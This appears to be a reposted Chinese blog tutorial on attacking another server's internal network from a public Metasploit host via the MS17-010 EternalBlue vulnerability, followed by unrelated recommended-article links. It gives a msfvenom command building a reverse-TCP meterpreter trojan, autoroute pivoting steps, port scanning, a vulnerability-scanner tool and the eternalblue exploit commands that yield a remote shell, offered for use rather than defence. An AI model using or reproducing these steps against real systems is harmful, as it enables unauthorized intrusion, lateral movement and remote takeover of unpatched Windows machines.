利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)「建议收藏」

利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)「建议收藏」前言其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2–>192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。准备工作1.安装了Msf的公网主机+Ubuntu系统2.一台其他服务器内网存在445漏洞3.细心,细心,细心,钻研,钻研!!!…

大家好,又见面了,我是你们的朋友全栈君。

前言

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2–>192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

 

准备工作

1.安装了Msf的公网主机+Ubuntu系统

2.一台其他服务器内网存在445漏洞

3.细心,细心,细心,钻研,钻研!!!

 

开始第一步:公网主机操作

生成msf木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

Msf监听端口:6666

 

 

可以看到,图中获取到了shell!

 

添加路由

 

第一步:run get_local_subnets (获取当前路由)

 

 

第二步:run autoroute -s 192.168.3.0/24 (添加路由)

 

 

第三步:run autoroute -p (查看已添加路由)

 

 

使用Payload进行攻击

 

第一步:background(转换到后台)

 

 

第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)

 

 

第三步:exploit(开始扫描)

 

注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)

如何列出那些存在445漏洞的PC?

 

MS_17_010_Scan.ziphttps://bbs.ichunqiu.com/thread-40308-1-1.html

 

 

描述:

工具的使用步骤如下:
解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
-ip参数可以指定IP扫描,同时支持IP段扫描:
MS_17_010_Scan.exe -ip 192.168.44.129
MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
-file参数支持从文件读取IP列表进行扫描:
MS_17_010_Scan.exe -file ip.txt
工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln MS17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
输出结果同时保存在当前目录的result.txt中。
 

上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)

 

攻击正式开始

 

第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)

第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)

第三步:exploit(执行攻击)

第四步:攻击完成,并且自动返回一个shell控制台

 

 

 

 
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/138607.html原文链接:https://javaforall.net

(0)
上一篇 2022年5月31日 上午8:00
下一篇 2022年5月31日 上午8:16


相关推荐

  • H5移动端开发学习总结

    H5移动端开发学习总结对于移动端开发而言,为了做到页面高清的效果,视觉稿的规范往往会遵循以下两点:1.首先,选取一款手机的屏幕宽高作为基准(现在一般选取iphone6的375×667)。之前项目中也用到过iphone5的320×568。2.对于retina屏幕(如:dpr=2),为了达到高清效果,视觉稿的画布大小会是基准的2倍,也就是说像素点个数是原来的4倍(对iphone6而言:原先的375×667,就会变成

    2022年6月21日
    46
  • 微信模拟地理位置_微信电脑版伪装地理位置的方法

    微信模拟地理位置_微信电脑版伪装地理位置的方法在早前的教程中,本站给大家介绍了使用微信伪装地理位置这款app进行微信位置伪装的方法,不过,不少网友都表示:这是一款涉及众多高危权限,包括读取短信和联系人等的App,不少网友都不是非常乐意。因此,今天小编就给大家再介绍一个方法,这个方法是使用Bluestacks这款安卓模拟器,有了它我们在电脑上也可以使用微信搜索附近的朋友,但经常有朋友说bs安装好微信,却不能定位,找不到附近的人,如图。其实这…

    2022年6月13日
    58
  • 我的家庭私有云计划-17

    我的家庭私有云计划-17

    2021年8月17日
    62
  • LVM(Logical Volume Manager)

    LVM(Logical Volume Manager)

    2021年8月26日
    54
  • 把旧光驱改CD播放机的方法

    把旧光驱改CD播放机的方法  随着我们自己PC机各项配件的不断升级,或多或少都会淘汰下来一些旧配件。它们是否真的就只能躺在角落里睡大觉呢?能够最大限度利用上这些曾经为我们驰骋沙场,立下赫赫战功的战将吗?那么就要看我们自己是否足够勤劳了。下面我们就以PC机中比较容易更新换代的光驱为例,来看看怎么让它恢复第二春吧。  先天条件  通常来说,光驱“惨遭”淘汰的时候读盘能力已经很弱了,但机械上一般都没有损坏,特别是CD是完…

    2022年4月29日
    59
  • LinkList的基本创建

    LinkList的基本创建include iostream usingnamespa include malloc h include stdio h defineTURE1 defineFALSE0 defineOK1 defineERROR0 defineIINFEA 1 defineOV stdio h malloc h iostream

    2026年2月13日
    1

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号